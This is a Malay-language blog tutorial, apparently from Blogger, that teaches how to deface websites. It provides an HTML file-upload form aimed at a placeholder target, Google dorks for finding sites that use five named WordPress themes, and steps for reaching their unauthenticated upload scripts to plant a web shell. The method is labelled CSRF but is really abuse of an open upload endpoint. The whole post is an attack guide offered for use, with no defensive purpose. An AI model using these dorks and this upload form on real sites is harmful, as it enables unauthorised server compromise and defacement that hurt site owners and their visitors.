Tutorial Deface Method CSRF

Assalammualaikum
hari nie aku nk ajar method CSRF
okayy
copy dulu code nie
save dekat notepad nama : CSRF.html

<form enctype="multipart/form-data" action="SITE TARGET" method="post"><input type="jpg" name="url" value="./" /><br />Please choose a file: <input name="uploadfile" type="file" /><br /><input type="submit" value="upload" /></form>

*tukarkan site kepada site yang vuln nanti :)

Okay , 1st step
cari site menggunakan dork ini :


inurl:/wp-content/themes/shepard
inurl:/wp-content/themes/money
inurl:/wp-content/themes/clockstone
inurl:/wp-content/themes/ambleside
inurl:/wp-content/themes/pacifico

Dork nie bole dibesarkan :)

Okay
sekarang
masukkan salah satu dork itu dalam google/bing
contoh site : http://www.site.com/wp-content/themes/pacifico/
okayy
tambah kan theme dibelakang /pacifico
contoh : http://www.site.com/wp-content/themes/pacifico/theme

akan keluar mcm nie



pilih function kemudian pilih yang mana berkaitan dengan UPLOAD
contoh : upload.php , upload-bg.php dan sebagainya

Jika muncul "You Must Login....."atau blank? cari target lain!! :v  "Jika muncul "error" berarti Web target Vulnerable" :v
Selepas tu , Buka file CSRF.html yang tadi sudah di download dengan notepad, ganti SITETARGET  dengan link yang berada di addres bar target kamu tadi.dan SAVE !
Contoh: "http://www.site.com/wp-content/themes/pacifico/theme/functions/upload-bg.php"

Kemudian , buka fail CSRF.html tersebut kemudian pilih SHELL dan UPLOAD :v

Jika tak paham , boleh tengok video ni :v
TONTON DISINI

Sekian , Terima Kasih :)




Tutorial Deface Method CSRF Tutorial Deface Method CSRF Reviewed by MrNewbie on 00:28 Rating: 5

No comments:

Powered by Blogger.